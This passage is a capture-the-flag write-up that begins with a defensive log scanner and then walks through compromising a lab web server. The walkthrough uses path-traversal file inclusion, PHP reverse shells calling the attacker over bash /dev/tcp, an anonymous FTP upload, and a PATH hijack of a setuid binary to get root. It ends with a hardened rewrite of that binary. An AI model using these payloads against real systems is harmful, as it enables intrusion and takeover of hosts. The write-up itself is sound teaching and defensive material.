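        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_lang(value):
    """Return a reason string if the lang value looks like an inclusion attack, else None."""
    value = fully_decode(value)
    if TRAVERSAL_RE.search(value) or value.startswith("/"):
        return "traversal"
    if value not in ALLOWED_LANGS:
        return "not-allowlisted"
    return None


def inspect_request(target):
    """Inspect one request target (path + query); return a finding dict or None."""
    parts = urlsplit(target)
    if parts.path != WATCHED_PATH:
        return None
    # parse_qs percent-decodes once; fully_decode strips any further layers.
    for value in parse_qs(parts.query, keep_blank_values=True).get("lang", []):
        reason = classify_lang(value)
        if reason:
            return {"reason": reason, "query": parts.query, "decoded": fully_decode(value)}
    return None


def scan_log(text):
    """Run inspect_request over every parseable line; return the list of findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        hit = inspect_request(m["target"])
        if hit:
            hit.update(ip=m["ip"], ts=m["ts"], status=int(m["status"]), ua=m["ua"])
            findings.append(hit)
    return findings


# Constructed sample lines; IPs, paths and timestamps mirror the session above.
SAMPLE_LOG = """\
172.16.254.100 - - [21/Mar/2020:02:31:07 +0000] "GET /secret_information/ HTTP/1.1" 200 1477 "-" "Googlebot"
172.16.254.100 - - [21/Mar/2020:02:31:30 +0000] "GET /secret_information/?lang=es.php HTTP/1.1" 200 1500 "-" "Googlebot"
172.16.254.100 - - [21/Mar/2020:02:44:11 +0000] "GET /secret_information/?lang=../../../../../../../etc/passwd HTTP/1.1" 200 2191 "-" "Googlebot"
172.16.254.100 - - [21/Mar/2020:07:32:59 +0000] "GET /secret_information/?lang=..%2F..%2F..%2Fetc%2Fgroup HTTP/1.1" 200 1009 "-" "Googlebot"
172.16.254.100 - - [21/Mar/2020:07:56:45 +0000] "GET /secret_information/?lang=%252e%252e/%252e%252e/etc/vsftpd.conf HTTP/1.1" 200 6104 "-" "Googlebot"
172.16.254.100 - - [21/Mar/2020:08:01:12 +0000] "GET /secret_information/?lang=fr.php HTTP/1.1" 200 120 "-" "curl/7.68.0"
172.16.254.100 - - [21/Mar/2020:08:02:00 +0000] "GET /index.html HTTP/1.1" 200 10701 "-" "curl/7.68.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['reason']:16s} lang={f['decoded']}")
```

The "not-allowlisted" reason is the same check the application itself should have made: mapping lang to a fixed table of known files instead of passing it to include() removes the traversal entirely.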
  • We may be able to upload a PHP script that opens a remote connection and provides an interactive shell, for easier enumeration of the host
  • Performed an Internet search and found that the following seems to be a popular choice for a reverse shell
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
  • Set up a netcat listener in a separate terminal: nc -l -s 172.16.254.100 -p 65535
  • Created PHP file called x.php to be uploaded using FTP
cat x.php
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/171.16.254.100/65535 0>&1'");
  • Uploaded the file over FTP as the anonymous user; any password works, though traditionally an email address was used
  • Attempted to trigger the script through the file inclusion, but it was not executed. Tried a couple of different locations for the uploaded x.php, such as /pub and /srv/ftp/pub
  • Decided to manually review the configuration file of the FTP server
curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../etc/vsftpd.conf
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../etc/vsftpd.conf HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 07:56:45 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 6104
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone?  vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.

anon_umask=000

listen=NO
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
#write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in  your  local  time  zone.  The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories.  See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
#chroot_local_user=YES
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty.  Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO

#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
#
# Point users at the directory we created earlier.
anon_root=/var/ftp/
write_enable=YES
#



* Connection #0 to host 172.16.254.103 left intact
  • Found that the location for Anonymous FTP was in fact /var/ftp/, so attempted to get the file included using the path /var/ftp/pub/x.php but was unsuccessful. I was convinced that the script was being included but perhaps the netcat command was unsuccessful, so updated the script to provide an output to confirm that the script was run as y.php and uploaded y.php using FTP.
<?php
echo __FILE__;
exec("/bin/bash -c 'bash -i > /dev/tcp/171.16.254.100/65535 0>&1'");
  • Attempted the file inclusion curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../var/ftp/pub/y.php
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../var/ftp/pub/y.php HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 12:55:07 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 164
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

/var/ftp/pub/y.php


* Connection #0 to host 172.16.254.103 left intact
  • So we are able to get the file inclusion exploit but just need a better reverse shell. Grabbed the PentesterMonkey php reverse shell, updated the IP address and port, renamed the file to z.php, and uploaded the file using FTP. Attempted inclusion and success! We have a reverse shell to enumerate the remote host
  • Proceeded to manually enumerate the host and found a C program source code. Another executable with the same name as the C program source code existed in the same directory with the suid bit set and owned by root.
$ pwd
/home/tom
$ cat rootshell.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main() {

    printf("checking if you are tom...\n");
    FILE* f = popen("whoami", "r");

    char user[80];
    fgets(user, 80, f);

    printf("you are: %s\n", user);
    //printf("your euid is: %i\n", geteuid());

    if (strncmp(user, "tom", 3) == 0) {
        printf("access granted.\n");
        setuid(geteuid());
        execlp("sh", "sh", (char *) 0);
    }
}

  • Manually reviewed the source code to try and understand the program. The program appears to attempt to create a process and pipe the output to a file handle. A maximum of 80 characters are read into a character array. If the first 3 characters are ‘tom’ then it opens an elevated shell.
  • Created a script called whoami in /tmp to simply echo tom
cat /tmp/whoami
echo tom
  • Updated the PATH environment variable to prepend /tmp to it, so that /tmp/whoami would be selected first by default
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  • Ran the rootshell command and got an elevated shell
cd /root
ls -las
total 64
 4 drwx------  5 root root  4096 Feb  8 21:47 .
 4 drwxr-xr-x 19 root root  4096 Feb  8 12:17 ..
 4 -rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
 4 drwx------  2 root root  4096 Feb  8 12:23 .cache
 4 -rw-------  1 root root    34 Feb  8 12:38 .lesshst
 4 drwxr-xr-x  3 root root  4096 Feb  8 12:54 .local
 4 -rw-r--r--  1 root root   148 Aug 18  2015 .profile
 4 drwxr-xr-x  2 root root  4096 Feb  8 15:11 .vim
24 -rw-------  1 root root 21141 Feb  8 21:40 .viminfo
 4 -rw-r--r--  1 root root    21 Feb  8 14:34 .vimrc
 4 -rw-r--r--  1 root root   141 Feb  8 15:17 flag.txt
cat flag.txt
|\---------------\
||                |
|| UQ Cyber Squad |       
||                |
|\~~~~~~~~~~~~~~~\
|
|
|
|
o

flag{omg_you_did_it_YAY}
  • Submitted: flag{omg_you_did_it_YAY}
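The rootshell binary above fails for two reasons that the analysis of its source makes visible: it asks an external "whoami" (resolved through the caller's PATH) who the caller is instead of asking the kernel, and strncmp(user, "tom", 3) is a prefix match that would also accept a user named "tommy". The following hardened rewrite is an added example written for this writeup, not the challenge author's program; it assumes the intended user is still "tom" and that /bin/sh is the shell to hand over, and it resolves the identity with getpwuid(getuid()), compares the full name, and replaces the inherited environment before exec so the spawned shell does not carry the caller's PATH either.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>

/* Exact-match comparison of a user name. It tolerates the trailing newline
   that fgets() leaves on a line read from a pipe, so it is a drop-in check
   for the original program, but "tommy" or "tomas" no longer pass. */
int user_matches(const char *got, const char *expected) {
    size_t n = strlen(got);
    if (n > 0 && got[n - 1] == '\n')
        n--;
    return n == strlen(expected) && memcmp(got, expected, n) == 0;
}

/* Ask the kernel for the real uid and look its name up in the passwd
   database. Nothing here is resolved through PATH, so a caller cannot
   substitute their own "whoami". Returns 0 on success, -1 on failure
   (unknown uid or a buffer too small for the name). */
int real_user_name(char *buf, size_t len) {
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL || pw->pw_name == NULL)
        return -1;
    if (snprintf(buf, len, "%s", pw->pw_name) >= (int)len)
        return -1;
    return 0;
}

int main(void) {
    char user[80];

    if (real_user_name(user, sizeof user) != 0) {
        perror("getpwuid");
        return 1;
    }
    printf("you are: %s\n", user);

    if (!user_matches(user, "tom")) {   /* assumed intended user */
        puts("access denied.");
        return 1;
    }
    puts("access granted.");

    /* Replace the caller's environment: the shell gets a fixed PATH rather
       than whatever the caller prepended (e.g. /tmp). */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };

    if (setuid(geteuid()) != 0) {       /* check the result, unlike the original */
        perror("setuid");
        return 1;
    }
    execle("/bin/sh", "sh", (char *)0, envp);
    perror("execle");                   /* only reached if exec failed */
    return 1;
}
```

Compile it with `gcc -Wall -o rootshell_hardened rootshell_hardened.c`; run as an unprivileged user it prints the real account name and denies access unless that account is exactly "tom". The setuid() return value is checked deliberately: on a kernel that refuses the call, the original program would have silently spawned a shell with whatever privileges it happened to hold.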

See also